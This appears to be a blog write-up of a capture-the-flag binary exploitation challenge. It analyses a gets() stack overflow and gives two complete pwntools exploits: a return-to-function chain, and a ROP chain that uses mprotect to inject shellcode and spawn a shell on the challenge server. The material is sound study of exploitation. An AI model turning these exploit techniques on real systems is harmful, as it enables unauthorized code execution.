加载头像

get_started_3dsctf_2016

Ubuntu 16

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/get_started_3dsctf_2016/get_started_3dsctf_2016'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled		//栈不可执行
    PIE:      No PIE (0x8048000)

静态编译

1
get_started_3dsctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, not stripped

IDA

main()

1
2
3
4
5
6
7
8
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[56]; // [esp+4h] [ebp-38h] BYREF

  printf("Qual a palavrinha magica? ", v4[0]);
  gets(v4);	//gets()函数存在溢出
  return 0;
}

可疑函数get_flag()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
void __cdecl get_flag(int a1, int a2)
{
  int v2; // esi
  unsigned __int8 v3; // al
  int v4; // ecx
  unsigned __int8 v5; // al

  if ( a1 == 814536271 && a2 == 425138641 )	//a1,a2可操纵
  {
    v2 = fopen("flag.txt", "rt");
    v3 = getc(v2);
    if ( v3 != 255 )
    {
      v4 = (char)v3;
      do
      {
        putchar(v4);
        v5 = getc(v2);
        v4 = (char)v5;
      }
      while ( v5 != 255 );
    }
    fclose(v2);
  }
}

//0x80489A0

0x02

思路

1.利用gets()函数的溢出

2.get_flag函数没有return

​ 设置get_flag的ret为exit()

s 38H
ebp 0x4
ret get_flag()
get_flag_ret exit()
arg a1
arg a2

思路

1.利用mprotect()函数

0x03

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

context(os='linux', arch='i386', log_level='debug')
# io = process(['get_started_3dsctf_2016'])
io = remote('node4.buuoj.cn', 29510)

padding = 0x38
get_flag = 0x80489A0
exit_addr = 0x804E6A0
a1 = 0x308CD64F
a2 = 0x195719D1
payload = b'a' * padding + p32(get_flag) + p32(exit_addr) + p32(a1) + p32(a2)
io.sendline(payload)
sleep(1)
io.recv()
io.interactive()

exp2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *

context(os='linux', arch='i386', log_level='debug')
q = remote('node4.buuoj.cn', 29510)
# q = process('./get_started_3dsctf_2016')
context.log_level = 'debug'

mprotect = 0x0806EC80
buf = 0x80ea000
# pop_3_ret = 0x0804f460
pop_edx_ecx_ebx_ret = 0x0806fc30
read_addr = 0x0806E140

payload = b'a' * 56 + p32(mprotect) + p32(pop_edx_ecx_ebx_ret) + p32(buf) + p32(0x1000) + p32(0x7)
payload += p32(read_addr) + p32(buf) + p32(0) + p32(buf) + p32(0x100)
q.sendline(payload)
sleep(1)

shellcode = asm(shellcraft.sh())
q.sendline(shellcode)
sleep(1)
q.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體